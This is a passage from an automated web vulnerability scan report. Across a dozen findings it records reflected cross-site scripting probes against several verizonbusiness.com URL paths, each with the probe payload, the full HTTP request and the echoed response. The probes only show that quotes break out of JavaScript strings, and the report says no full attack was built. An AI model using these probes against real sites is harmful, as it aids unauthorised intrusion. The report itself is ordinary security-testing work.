Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/continuityae3e5';8130fc85545/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.942. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80792"%3b8511b1fc7ae was submitted in the REST URL parameter 3. This input was echoed as 80792";8511b1fc7ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/continuity80792"%3b8511b1fc7ae/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/continuity80792";8511b1fc7ae/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.943. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6757'%3b4b32638a1df was submitted in the REST URL parameter 1. This input was echoed as f6757';4b32638a1df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf6757'%3b4b32638a1df/bysolutions/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:25 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsf6757';4b32638a1df/bysolutions/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.944. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64112"%3b59255b08c60 was submitted in the REST URL parameter 1. This input was echoed as 64112";59255b08c60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions64112"%3b59255b08c60/bysolutions/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:52 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions64112";59255b08c60/bysolutions/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.945. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5af1'%3b552d7794ebb was submitted in the REST URL parameter 2. This input was echoed as b5af1';552d7794ebb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb5af1'%3b552d7794ebb/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsb5af1';552d7794ebb/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.946. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c81"%3bd3cdd5d87a4 was submitted in the REST URL parameter 2. This input was echoed as e0c81";d3cdd5d87a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionse0c81"%3bd3cdd5d87a4/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41876
Date: Wed, 17 Nov 2010 00:36:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionse0c81";d3cdd5d87a4/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.947. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbdab"%3baed02c97c16 was submitted in the REST URL parameter 3. This input was echoed as bbdab";aed02c97c16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/emergencybbdab"%3baed02c97c16/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/emergencybbdab";aed02c97c16/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.948. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba62e'%3b6702327ab2c was submitted in the REST URL parameter 3. This input was echoed as ba62e';6702327ab2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/emergencyba62e'%3b6702327ab2c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/emergencyba62e';6702327ab2c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.949. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82543'%3bc081d73746f was submitted in the REST URL parameter 1. This input was echoed as 82543';c081d73746f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions82543'%3bc081d73746f/bysolutions/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:48 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions82543';c081d73746f/bysolutions/field/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.950. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b31"%3b6d114c17c07 was submitted in the REST URL parameter 1. This input was echoed as 76b31";6d114c17c07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions76b31"%3b6d114c17c07/bysolutions/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions76b31";6d114c17c07/bysolutions/field/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.951. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca542"%3b302e3c7c6f3 was submitted in the REST URL parameter 2. This input was echoed as ca542";302e3c7c6f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsca542"%3b302e3c7c6f3/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsca542";302e3c7c6f3/field/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.952. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a1f9'%3b48c21336279 was submitted in the REST URL parameter 2. This input was echoed as 9a1f9';48c21336279 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions9a1f9'%3b48c21336279/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions9a1f9';48c21336279/field/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.953. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab9a3'%3b07c7bbeb341 was submitted in the REST URL parameter 3. This input was echoed as ab9a3';07c7bbeb341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/fieldab9a3'%3b07c7bbeb341/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/fieldab9a3';07c7bbeb341/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.954. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6450f"%3bcf06a9b0721 was submitted in the REST URL parameter 3. This input was echoed as 6450f";cf06a9b0721 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

